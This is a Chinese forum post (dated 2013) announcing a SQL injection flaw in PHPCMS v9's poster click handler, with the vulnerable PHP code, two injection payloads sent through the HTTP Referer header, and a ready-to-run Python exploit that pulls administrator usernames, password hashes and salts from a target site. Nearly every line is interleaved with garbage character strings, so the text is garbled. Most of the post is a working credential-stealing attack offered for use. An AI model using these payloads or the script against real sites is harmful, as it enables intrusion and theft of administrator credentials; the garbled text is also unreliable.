有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:( x; ?* E6 S' O, p3 b& S
+ {4 `# I8 v' W
问题函数\phpcms\modules\poster\index.php& D' g0 q. j) U7 M( K
: {, `( u& O8 N" Z# j: l4 Kpublic function poster_click() {2 D& l9 a- G. D2 K2 x
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
+ s& J3 b+ g, [+ T& M# G$r = $this->db->get_one(array('id'=>$id));# X* |+ Z0 E& Q6 Y8 i: p
if (!is_array($r) && empty($r)) return false;
" B+ k7 T4 }1 Z9 ?/ b1 R+ U) t$ip_area = pc_base::load_sys_class('ip_area');2 E- r V L2 `& j& L' A C/ ~3 n
$ip = ip();# b" [& C; Y$ j( M. p8 p N+ b
$area = $ip_area->get($ip);1 t# c. r# @& j p) i1 G
$username = param::get_cookie('username') ? param::get_cookie('username') : '';" B! T- K. B. Z' d$ i" p' k/ N
if($id) {" m, ~/ s! M, U0 }- N7 ?% V0 X) Z9 x
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();$ |, U7 `% v4 y0 o
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));5 U3 I5 ^! j8 w! k9 J3 _- q
}0 e% _% t! \; {$ f0 U
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
9 ?1 f9 i, m5 w$setting = string2array($r['setting']);! {+ ]1 y% t/ _/ c7 @
if (count($setting)==1) {) W) V) C# i- E$ y. s
$url = $setting['1']['linkurl'];
6 q1 R' O, W6 O1 G. [4 ?- B} else {
8 M# U9 F. r% j$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
9 Z- h1 o/ D2 S+ D}
; u& D- R2 e. V5 ~header('Location: '.$url);
/ c, R _$ z5 F$ T3 `$ ^$ t}
/ J% a, N- y5 |+ @4 ?% h6 W
0 e: g; ~4 n; e" R) B, \3 z
6 c4 N W0 S& }% b0 p9 p, n( B5 e" M+ P9 x7 l4 J9 T0 e. u
利用方式:( \3 G5 ~3 a) R
% ?; J1 I% f/ s; o `/ s# @# [( M
1、可以采用盲注入的手法:
+ _& c5 s" k5 B7 l+ g+ F2 B8 I0 E4 t& k3 \, F) i7 D
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#% B2 h( ^& b- F, s
# V$ d1 {+ c7 m通过返回页面,正常与否一个个猜解密码字段。
7 C8 ?- w* i. t" k$ q' C+ g7 n) V5 }0 Z
2、代码是花开写的,随手附上了:
' R n, D5 x1 l( C1 H0 J( i) n8 F
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#2 S. F) n+ l9 [6 |
M7 C1 \: R! C, ~
此方法是爆错注入手法,原理自查。3 k& f/ \+ G% `/ I
& v$ E( T8 K8 I
. \0 M) Z) i |' i3 X6 _- N6 ]# _
' p, r4 c% ~/ e+ @; \( ?2 C: V# D3 b利用程序:$ ~% Z+ E: U. `% {( n$ @8 A
P |8 R/ ~0 o- g* O
#!/usr/bin/env python+ Z5 y' Q6 ?- ?* g! c
import httplib,sys,re% r+ s6 f' N% n
# F2 G3 w6 v* v( [) H8 a, J+ cdef attack():8 f" s3 e4 |% G& ]$ ?" a
print “Code by Pax.Mac Team conqu3r!”
2 j* B5 e1 o* u( E p* V8 kprint “Welcome to our zone!!!”
6 @1 n" ~+ R# j; p9 E+ G- B gurl=sys.argv[1]
/ F6 T( \& o" {; s8 m/ b( P0 Npaths=sys.argv[2]/ }# j. P5 V2 q, F$ r: U( i
conn = httplib.HTTPConnection(url)9 e1 B# f2 B% g3 Q/ A# q
i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,8 E `6 R( J, B) ], g
“Accept”: “text/plain”,
0 L, [- {0 ^2 ~. k“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
5 O7 c% G/ H, E$ |% ?) o1 |) tconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers) h( t: k/ m# S6 D# h
r1 = conn.getresponse()5 g0 H4 Y& w' n: _( ]
datas=r1.read()
: T: h& W% Y) q7 a0 H/ m7 Y& ydatas=re.findall(r”Duplicate entry \’\w+’”, datas)+ q+ N/ ~, F9 B
print datas[0]
$ N7 k, U& A3 d( W, }) gconn.close()& P" x$ u0 J# R
if __name__==”__main__”:+ r% G) R$ B- Z/ G$ ^+ h
if len(sys.argv)<3:
, _0 N" G! s# n ]! |; I* g! Jprint “Code by Pax.Mac Team conqu3r”5 ^2 c7 R( ~$ {' S# H& m
print “Usgae:”
% O8 @' W0 g, }. B* Lprint “ phpcmsattack.py www.paxmac.org /”
2 o1 h V) `# Z; p9 ]) m/ Vprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
0 J }' I+ E4 K2 p' osys.exit(1)
c. G# r( e( y; s! j& i7 v. Xattack(); n/ v1 b+ h P& C" B* E
- U4 J' {0 K, a9 N4 J4 I& v |
发表于 2013-1-11 21:01:00
收藏
支持
反对